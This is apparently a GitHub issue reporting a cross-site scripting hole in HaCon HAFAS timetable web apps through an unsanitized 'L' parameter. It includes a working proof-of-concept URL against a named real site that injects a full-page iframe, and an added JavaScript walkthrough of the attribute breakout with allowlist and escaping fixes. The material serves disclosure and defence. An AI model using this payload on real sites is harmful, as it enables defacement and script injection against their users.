Indeed, this is an XSS vulnerability in their HAFAS-based sites, not in hafas-client.
I've tried to get in touch with HaCon about this by just calling their contact phone number. They told me it's none of their business since I'm not a business partner of them. 🤡
Will get in touch with @zerforschung later or tomorrow. Maybe they're interested in dealing with this.
derhuerst changed the title from "XSS Vulnerability in HAFAS Client" to "XSS vulnerability in some HAFAS instances" on Jul 7, 2023
There is a cross-site scripting security vulnerability in the HAFAS client.
For example this link:
https://fahrplan.vmobil.at/webapp/index.html?L=vs_vvv%2Fjs%2Fhafas_webapp_config.js%3Fv%3D1613454502135%22%20onload%3D%22var%20e%3D%20document.createElement%28%27iframe%27%29%3Be.src%3D%27https%3A%2F%2Ftrollface.dk%27%3Be.style.cssText%20%3D%20%27position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A100%3Bbackground%3A%23000%27%3Bdocument.body.appendChild%28e%29%3B%22
which results in the following HTML:
https://cdn.koeck.dev/276d8e.png
The vulnerable parameter is the L parameter, which sets the customer. The parameter is not sanitized.
I've found the vulnerability in several web apps which use the HAFAS client, but I'm not sure whether the vulnerability is a bug in the HAFAS client or in the implementation of HAFAS. I just wanted to report the vulnerability here because my phone call was left unanswered :D
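The attribute-breakout the report describes, worked through as an added example. This is not code from the issue, from hafas-client, or from any HaCon HAFAS deployment. Only the proof-of-concept URL and the config-script path visible inside it come from the page; the template the real webapp uses to turn `L` into a script tag is an assumption, as are the allowlist `KNOWN_CUSTOMERS` and the helper names. Decoding the link shows why the payload works: the value of `L` keeps the real `vs_vvv/js/hafas_webapp_config.js?v=...` path in front of a closing `"`, so the script presumably still loads, and the `onload="..."` that follows the quote is parsed as a second attribute whose handler injects a full-page iframe.

```javascript
// Added example, not code from hafas-client or from any HaCon HAFAS site.
// It models the bug reported above: the `L` query parameter (the customer id)
// is dropped unsanitized into the src attribute of a <script> tag. The exact
// template the real webapp uses is an ASSUMPTION; only the proof-of-concept
// URL and the config-script path visible in it are taken from the issue.
// Runs under Node.js (URL is a global since Node 10).

// Proof-of-concept link from the issue, verbatim.
const POC_URL =
  "https://fahrplan.vmobil.at/webapp/index.html?L=vs_vvv%2Fjs%2Fhafas_webapp_config.js%3Fv%3D1613454502135%22%20onload%3D%22var%20e%3D%20document.createElement%28%27iframe%27%29%3Be.src%3D%27https%3A%2F%2Ftrollface.dk%27%3Be.style.cssText%20%3D%20%27position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A100%3Bbackground%3A%23000%27%3Bdocument.body.appendChild%28e%29%3B%22";

// The L parameter as a page script would read it (percent-decoded).
function customerParam(url) {
  return new URL(url).searchParams.get("L");
}

// ASSUMED vulnerable pattern: string concatenation into markup. A `"` inside L
// closes the src value, so everything after it becomes further attributes on
// the tag; here an onload= handler that fires once the config script loads.
function scriptTagVulnerable(l) {
  return '<script src="' + l + '"></script>';
}

// Minimal attribute scan used to show which attributes the browser will see.
// Good enough for the tag shapes built in this file; not a general HTML parser.
function attributeNames(tag) {
  const names = [];
  const re = /\s([A-Za-z_:][\w:.-]*)\s*=\s*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Hardened pattern: the customer id is validated against an allowlist and the
// script path is built from the validated id, never from the raw query string.
// KNOWN_CUSTOMERS is a made-up list; vs_vvv is the id seen in the PoC URL.
const KNOWN_CUSTOMERS = new Set(["vs_vvv"]);
const CUSTOMER_ID_RE = /^[a-z0-9_]{1,32}$/;

function scriptTagSafe(l) {
  if (typeof l !== "string" || !CUSTOMER_ID_RE.test(l) || !KNOWN_CUSTOMERS.has(l)) {
    return null; // reject; the caller should fall back to a default customer
  }
  // Path shape taken from the PoC URL: <customer>/js/hafas_webapp_config.js
  return '<script src="' + l + '/js/hafas_webapp_config.js"></script>';
}

// Defence in depth for any place that still has to interpolate user input
// into an attribute: HTML-escape it so a quote cannot terminate the value.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function scriptTagEscaped(l) {
  return '<script src="' + escapeAttr(l) + '"></script>';
}

// Runs the PoC value through all three builders and reports what each yields.
function demonstrate(url) {
  const l = customerParam(url);
  return {
    decoded: l,
    vulnerableAttrs: attributeNames(scriptTagVulnerable(l)),
    escapedAttrs: attributeNames(scriptTagEscaped(l)),
    allowlistResult: scriptTagSafe(l), // null: payload rejected outright
  };
}
```

Calling `demonstrate(POC_URL)` shows the decoded `L` value, `["src", "onload"]` for the concatenated tag, `["src"]` once the value is attribute-escaped, and `null` from the allowlist builder. The allowlist is the fix to prefer: a customer id has a tiny legal alphabet, so rejecting anything else removes the whole class of injection, whereas escaping only patches the one sink. If the tag is created client-side, building it with `document.createElement("script")` and assigning `.src` is attribute-injection-proof for the same reason: there is no markup string for a quote to break out of.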